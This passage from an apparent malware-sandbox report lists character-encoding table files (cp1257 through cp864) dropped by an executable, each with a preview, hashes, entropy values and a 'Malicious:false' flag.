                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp1257, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC0081201A0083201E20262020202100882030008A2039008C00A802C700B8..009020182019201C201D20222013201400982122009A203A009C00AF02DB009F..00A0000000A200A300A4000000A600A700D800A9015600AB00AC00AD00AE00C6..00B000B100B200B300B400B500B600B700F800B9015700BB00BC00BD00BE00E6..0104012E0100010600C400C501180112010C00C90179011601220136012A013B..01600143014500D3014C00D500D600D701720141015A016A00DC017B017D00DF..0105012F0101010700E40
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1111
                                                                                                                                                                                                                              Entropy (8bit):3.2984943182702593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CKlHVBUlJvRj7SOVbusZhAMiZyi77qdIQ2jFvGNNykoxWi3/i:xMlBVnrAMiwMmdIQufkoxn3q
                                                                                                                                                                                                                              MD5:12BCEAE6B6A5FAE5AE9C42F5998BA485
                                                                                                                                                                                                                              SHA1:C9620DA0C763D2C3770386E69EE7E421BD1BA965
                                                                                                                                                                                                                              SHA-256:29D93DEE7C01B2264778BC6B75F6EF76EA6AC53E9F4A334D83707229E7F482D2
                                                                                                                                                                                                                              SHA-512:714BAF58462FB0E84A32D82C8FC2D63EDF78DF8CCE578391E2521737F94F860B5CCFE41B481E1D09879A6811FCFD8B98A2724DB1D15749BD5293A9B33BCAD071
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp1258, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC0081201A0192201E20262020202102C62030008A20390152008D008E008F..009020182019201C201D20222013201402DC2122009A203A0153009D009E0178..00A000A100A200A300A400A500A600A700A800A900AA00AB00AC00AD00AE00AF..00B000B100B200B300B400B500B600B700B800B900BA00BB00BC00BD00BE00BF..00C000C100C2010200C400C500C600C700C800C900CA00CB030000CD00CE00CF..011000D1030900D300D401A000D600D700D800D900DA00DB00DC01AF030300DF..00E000E100E2010300E40
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1110
                                                                                                                                                                                                                              Entropy (8bit):3.515546664597914
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CFyHVBUlJvRj7SOVbusZhAMiZyi77qZpuHVBIqE18wDyV8mK:wyMlBVnrAMiwMm+VhE1LmK
                                                                                                                                                                                                                              MD5:CE6D8A6542DC12D1783084FA4B2B63EA
                                                                                                                                                                                                                              SHA1:5039A350C8E3E2C6F353B438B41BD0B6A7AB8069
                                                                                                                                                                                                                              SHA-256:E5613C04D3D2EE44CCAD85AE53A37C257674491C540836E5D942BBCC4E4A8DB4
                                                                                                                                                                                                                              SHA-512:E8C5CFB747486BBE0E567B6E87B59D5246D749A80C8F64F6669227C7FD849886F98A1F94451922AC099409AC14890F1A8B1E5F25EA584FDB1522ACE3AD0BE6A6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp437, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C700FC00E900E200E400E000E500E700EA00EB00E800EF00EE00EC00C400C5..00C900E600C600F400F600F200FB00F900FF00D600DC00A200A300A520A70192..00E100ED00F300FA00F100D100AA00BA00BF231000AC00BD00BC00A100AB00BB..259125922593250225242561256225562555256325512557255D255C255B2510..25142534252C251C2500253C255E255F255A25542569256625602550256C2567..2568256425652559255825522553256B256A2518250C25882584258C25902580..03B100DF039303C003A303
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1110
                                                                                                                                                                                                                              Entropy (8bit):3.6177058818384693
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CjHVBUlJvRj7SOVbusZhAMiZyi77qSKOQFhWehDrq18wDyVKockoiH:WMlBVnrAMiwMmSKOQFhWeh3q1odH
                                                                                                                                                                                                                              MD5:8EF3CBCA101F5777846D12D3C96A0A7D
                                                                                                                                                                                                                              SHA1:5EC5418B861894E0F18EA15AA4414019815E2EA2
                                                                                                                                                                                                                              SHA-256:A0415F14F5D72AD24E9C3A5C91517A0E3D22E1ADBC3505C0C6E918B961F7A07D
                                                                                                                                                                                                                              SHA-512:FB14C88E61E5459B4A8706751D88D0A261AC6B4171F72912D87CE78A2BC97A821CCF5B53676FB229C08F9E557BE624F4DC649B722A906B9B7944ED2D5E7F9065
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp737, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..039103920393039403950396039703980399039A039B039C039D039E039F03A0..03A103A303A403A503A603A703A803A903B103B203B303B403B503B603B703B8..03B903BA03BB03BC03BD03BE03BF03C003C103C303C203C403C503C603C703C8..259125922593250225242561256225562555256325512557255D255C255B2510..25142534252C251C2500253C255E255F255A25542569256625602550256C2567..2568256425652559255825522553256B256A2518250C25882584258C25902580..03C903AC03AD03AE03CA03
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1110
                                                                                                                                                                                                                              Entropy (8bit):3.451057608106102
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CsOHVBUlJvRj7SOVbusZhAMiZyi77qoo9ecL067J4ZNUPVw3PfA:AMlBVnrAMiwMm59T067KDLPo
                                                                                                                                                                                                                              MD5:9656761FA02EA24773EAD3E5C4BDB975
                                                                                                                                                                                                                              SHA1:366228F25392708FA799E9CC0830CE9917EF6CA7
                                                                                                                                                                                                                              SHA-256:C3C6542E902DEC2C44DDCFD8B5CB7ABF309B0413A7CED1614DC0B20CF7C5E35F
                                                                                                                                                                                                                              SHA-512:A6A44B9A2193D75764DC284BE53264E57BFEB2A221FD54B4577DD90752F69A45E6B9D293108A7AB895F347A24FD10AAE84954A043AB1F466F485D707D7412380
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp775, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..010600FC00E9010100E4012300E501070142011301560157012B017900C400C5..00C900E600C6014D00F6012200A2015A015B00D600DC00F800A300D800D700A4..0100012A00F3017B017C017A201D00A600A900AE00AC00BD00BC014100AB00BB..259125922593250225240104010C01180116256325512557255D012E01602510..25142534252C251C2500253C0172016A255A25542569256625602550256C017D..0105010D01190117012F01610173016B017E2518250C25882584258C25902580..00D300DF014C014300F500
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1110
                                                                                                                                                                                                                              Entropy (8bit):3.3718781469586827
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:C9HVBUlJvRj7SOVbusZhAMiZyi77qZpuHVBc+myS5LeQDTVwA:EMlBVnrAMiwMm+VeyS5SQn/
                                                                                                                                                                                                                              MD5:2169EE726DCC011E6C3505D586C88FC3
                                                                                                                                                                                                                              SHA1:094252AD0634787E2D7F0D28A448437054D359C7
                                                                                                                                                                                                                              SHA-256:13DF611F429A9B331DA1B34F3C718CCCAF0BD4AB44F71A9C632197987B4D643B
                                                                                                                                                                                                                              SHA-512:BC5831EF1C131095A22C76FFCB5C4217081AF796B60455BE2DE2E2689CFE1033F07E8B45449F77E7804A7D52CBCFB916B0B4639828E65B14475BB3367F47C8EE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp850, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C700FC00E900E200E400E000E500E700EA00EB00E800EF00EE00EC00C400C5..00C900E600C600F400F600F200FB00F900FF00D600DC00F800A300D800D70192..00E100ED00F300FA00F100D100AA00BA00BF00AE00AC00BD00BC00A100AB00BB..2591259225932502252400C100C200C000A9256325512557255D00A200A52510..25142534252C251C2500253C00E300C3255A25542569256625602550256C00A4..00F000D000CA00CB00C8013100CD00CE00CF2518250C2588258400A600CC2580..00D300DF00D400D200F500
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1110
                                                                                                                                                                                                                              Entropy (8bit):3.4509005787389877
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CPHVBUlJvRj7SOVbusZhAMiZyi77q7EUsOtycwQIc+922V:mMlBVnrAMiwMmwvOtycwQIc+9R
                                                                                                                                                                                                                              MD5:48402B424B5101BDEEB0192BBA96DB7D
                                                                                                                                                                                                                              SHA1:C9EB93A37AF70F4134AA9CF05D914A30FB3201DD
                                                                                                                                                                                                                              SHA-256:F3A18A8C7934F6586F023477E08D3F9D5EAD9A45E9E58A3F8D018AF9BB13F868
                                                                                                                                                                                                                              SHA-512:4EE615605BFF3D94A7FC4FE23D8288F0F20F6792C8C69ECACABAE82F1A334D8417C5DFFC0DA3702E2DB09B7BE1E5FF19C6A0F460C9A5EC84D1856BB9C8061CA5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp852, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C700FC00E900E200E4016F010700E7014200EB0150015100EE017900C40106..00C90139013A00F400F6013D013E015A015B00D600DC01640165014100D7010D..00E100ED00F300FA01040105017D017E0118011900AC017A010C015F00AB00BB..2591259225932502252400C100C2011A015E256325512557255D017B017C2510..25142534252C251C2500253C01020103255A25542569256625602550256C00A4..01110110010E00CB010F014700CD00CE011B2518250C258825840162016E2580..00D300DF00D40143014401
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1110
                                                                                                                                                                                                                              Entropy (8bit):3.4277025591531864
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CoHVBUlJvRj7SOVbusZhAMiZyi77qLHVWjwk/rMZC032SLnD2JbD:hMlBVnrAMiwMmx8whM03VLDy
                                                                                                                                                                                                                              MD5:8B8AA56F83BA750EB73FAE542E76FF1A
                                                                                                                                                                                                                              SHA1:2F3C3BA4B854A7D6B0A3D27BC519EE66A042E05A
                                                                                                                                                                                                                              SHA-256:E64FD2E639DA6F654D9BFBB2266F9432259A6A55941622F5CDDC3797E382EB0A
                                                                                                                                                                                                                              SHA-512:8B4061176663F7AC01B3969D25F680B5870A8EAD864CFAD897F18E75409CE721E6CC367A88EBABAF72E77D4542EE1894F2A6EE47A43FB3D4C650CFA18DFD3D71
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp855, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0452040204530403045104010454040404550405045604060457040704580408..04590409045A040A045B040B045C040C045E040E045F040F044E042E044A042A..0430041004310411044604260434041404350415044404240433041300AB00BB..259125922593250225240445042504380418256325512557255D043904192510..25142534252C251C2500253C043A041A255A25542569256625602550256C00A4..043B041B043C041C043D041D043E041E043F2518250C25882584041F044F2580..042F044004200441042104
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1110
                                                                                                                                                                                                                              Entropy (8bit):3.364496856690505
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CaHVBUlJvRj7SOVbusZhAMiZyi77qZpu6uUV5Dw5LeBCVHjzA:jMlBVnrAMiwMmyUVFw5SYdI
                                                                                                                                                                                                                              MD5:BA52A031DE1B1A6ED1C41BED8946750C
                                                                                                                                                                                                                              SHA1:BD54C0E2F62FD36675892A61FD8B340A56845D20
                                                                                                                                                                                                                              SHA-256:B6CD5C6F2B54D89142679D599ED0A5DEE6955A3B3F6B6673E46AFE7A5A303CDC
                                                                                                                                                                                                                              SHA-512:5F915AABE39F31CE9337B4B9B0239DF8ADA898D2D9F111DD09D97689DB89CF45B093AC187FC28484CFB213D14B0D8F58C5668D0A59726282D6F52D5D24697816
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp857, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C700FC00E900E200E400E000E500E700EA00EB00E800EF00EE013100C400C5..00C900E600C600F400F600F200FB00F9013000D600DC00F800A300D8015E015F..00E100ED00F300FA00F100D1011E011F00BF00AE00AC00BD00BC00A100AB00BB..2591259225932502252400C100C200C000A9256325512557255D00A200A52510..25142534252C251C2500253C00E300C3255A25542569256625602550256C00A4..00BA00AA00CA00CB00C8000000CD00CE00CF2518250C2588258400A600CC2580..00D300DF00D400D200F500
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1110
                                                                                                                                                                                                                              Entropy (8bit):3.506813480871637
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CMHVBUlJvRj7SOVbusZhAMiZyi77qij4Axlt49Y18wDyV8mK:VMlBVnrAMiwMm/g+9Y1LmK
                                                                                                                                                                                                                              MD5:C416471B57FB894DC45D30C31B4BD2E2
                                                                                                                                                                                                                              SHA1:BA378F8122280992AE51245A06814D8155564220
                                                                                                                                                                                                                              SHA-256:804EFA345C5BBBAD2449C318A7A3F5B31F4234712AAD23DC49B3FB5AA33B7A57
                                                                                                                                                                                                                              SHA-512:E7CDE706CFE573525C2DE319AD5783AE9D97C4F6D28B14A77A729F281540B0DAFAD4C14879EF76473BFDEBC38499C65CA228470983F2D1BC31938A91A2486522
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp860, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C700FC00E900E200E300E000C100E700EA00CA00E800CD00D400EC00C300C2..00C900C000C800F400F500F200DA00F900CC00D500DC00A200A300D920A700D3..00E100ED00F300FA00F100D100AA00BA00BF00D200AC00BD00BC00A100AB00BB..259125922593250225242561256225562555256325512557255D255C255B2510..25142534252C251C2500253C255E255F255A25542569256625602550256C2567..2568256425652559255825522553256B256A2518250C25882584258C25902580..03B100DF039303C003A303
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1110
                                                                                                                                                                                                                              Entropy (8bit):3.5174672833207183
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:ClHVBUlJvRj7SOVbusZhAMiZyi77qZpORVPnA2Gm18wDyV8mK:8MlBVnrAMiwMmiVPAA1LmK
                                                                                                                                                                                                                              MD5:4997979FD1692063E2B9AA9870E0BE4C
                                                                                                                                                                                                                              SHA1:919012354B99BBEF4C85517E89A2C9CD340FCE49
                                                                                                                                                                                                                              SHA-256:4B7E76AEB75289FACA76434EA6E9874E9504AD2BC3D8D47550EADBCC8294857E
                                                                                                                                                                                                                              SHA-512:C122A1AE2DE79CB97E5989535B7478A76D905CDE60B01F80F5B84EDB9DF08BE6829E1811AF19608971DA048B8DA24F40DE0217A8054AC612EC2D8B3560500FBE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp861, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C700FC00E900E200E400E000E500E700EA00EB00E800D000F000DE00C400C5..00C900E600C600F400F600FE00FB00DD00FD00D600DC00F800A300D820A70192..00E100ED00F300FA00C100CD00D300DA00BF231000AC00BD00BC00A100AB00BB..259125922593250225242561256225562555256325512557255D255C255B2510..25142534252C251C2500253C255E255F255A25542569256625602550256C2567..2568256425652559255825522553256B256A2518250C25882584258C25902580..03B100DF039303C003A303
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1110
                                                                                                                                                                                                                              Entropy (8bit):3.5573268031592717
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CdMHVBUlJvRj7SOVbusZhAMiZyi77q36AqE18wDyV8mK:iMMlBVnrAMiwMmq3E1LmK
                                                                                                                                                                                                                              MD5:9B4D1B95B20BD67555517DCC3007B22A
                                                                                                                                                                                                                              SHA1:2C0D6121DB49CDAB6FBAA81398BE2E44BE4E1110
                                                                                                                                                                                                                              SHA-256:6C15CB256B1C22170292589C6F589E64E164EB36EC7E84F0BD48149BABB7C5FC
                                                                                                                                                                                                                              SHA-512:34C3E401364D579E8AC7A4E1F1F7A29A84C62E1D5146D7664832639EA3997227DC4BAF1B64DC605E6574D680E61B55D0C69C329E35B1BEC41501FC68C5B634B7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp862, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..05D005D105D205D305D405D505D605D705D805D905DA05DB05DC05DD05DE05DF..05E005E105E205E305E405E505E605E705E805E905EA00A200A300A520A70192..00E100ED00F300FA00F100D100AA00BA00BF231000AC00BD00BC00A100AB00BB..259125922593250225242561256225562555256325512557255D255C255B2510..25142534252C251C2500253C255E255F255A25542569256625602550256C2567..2568256425652559255825522553256B256A2518250C25882584258C25902580..03B100DF039303C003A303
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1110
                                                                                                                                                                                                                              Entropy (8bit):3.518080906819747
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CXHVBUlJvRj7SOVbusZhAMiZyi77qwGuXVFq5EC18wDyV8mK:eMlBVnrAMiwMmw3VFu1LmK
                                                                                                                                                                                                                              MD5:C93CCDF65F7F349F22855745660F02AE
                                                                                                                                                                                                                              SHA1:604888B1FB3C57DF47277CDD1153597BA89E8C36
                                                                                                                                                                                                                              SHA-256:232D6FE34D7151920232EAAE9C515F36400AB64136DCC5B802D6245AC6F5D56B
                                                                                                                                                                                                                              SHA-512:D5B65AE7353F694A37AF29177BF1A95477918FC5A002C2FE199624BD5B391698807BAECF54225BC40F62B3CA7912C7066A4AAF01B9E3E399133831CAA342BF4F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp863, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C700FC00E900E200C200E000B600E700EA00EB00E800EF00EE201700C000A7..00C900C800CA00F400CB00CF00FB00F900A400D400DC00A200A300D900DB0192..00A600B400F300FA00A800B800B300AF00CE231000AC00BD00BC00BE00AB00BB..259125922593250225242561256225562555256325512557255D255C255B2510..25142534252C251C2500253C255E255F255A25542569256625602550256C2567..2568256425652559255825522553256B256A2518250C25882584258C25902580..03B100DF039303C003A303
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1110
                                                                                                                                                                                                                              Entropy (8bit):3.72017408907567
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CwHVBUlJvRj7YOVbusZhAMiZyi77qcHj92OibcDQAyUjSG:5MlrVnrAMiwMmSsNcDQvcSG
                                                                                                                                                                                                                              MD5:146E0D1779D50E070E0EF875E8374DF8
                                                                                                                                                                                                                              SHA1:B51E5598712598BC387DD79AE80BD879F139140D
                                                                                                                                                                                                                              SHA-256:81BEBFD9A61E9F17495763B68D57742FAB2A1A43871015699A2C8E5FDED4EC19
                                                                                                                                                                                                                              SHA-512:1F0DAD8E77712C5A018894332BE72FF5C546C92F481421CCB8553AD6F1E9A18617765C8CEE4187265CCCB1AB073E221289D34C9AB1F0501231D52C81FC1C932B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp864, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..00200021002200230024066A0026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00B000B72219221A259225002502253C2524252C251C25342510250C25142518..03B2221E03C600B100BD00BC224800AB00BBFEF7FEF8009B009CFEFBFEFC009F..00A000ADFE8200A300A4FE8400000000FE8EFE8FFE95FE99060CFE9DFEA1FEA5..0660066106620663066406650666066706680669FED1061BFEB1FEB5FEB9061F..00A2FE80FE81FE83FE85FECAFE8BFE8DFE91FE93FE97FE9BFE9FFEA3FEA7FEA9..FEABFEADFEAFFEB3FEB7FEBBFEBFFEC1FEC5FECBFECF00A600AC00F700D7FEC9..0640FED3FED7FEDBFEDFFE
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1110
                                                                                                                                                                                                                              Entropy (8bit):3.5193842128126676
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CsKHVBUlJvRj7SOVbusZhAMiZyi77qZpuHVBnAFj18wDyV8mK:gMlBVnrAMiwMm+VRAFj1LmK
                                                                                                                                                                                                                              MD5:150B2E00B3F84F8075F3653ED7A4C8E0
                                                                                                                                                                                                                              SHA1:7131DC656EFE1F2277B19DA72F0EEB46B4EC54A0
                                                                                                                                                                                                                              SHA-256:ADA1A52064EE93EBE6F8A5D101D01F8776038E12F21A5CA1C006EE833577C705
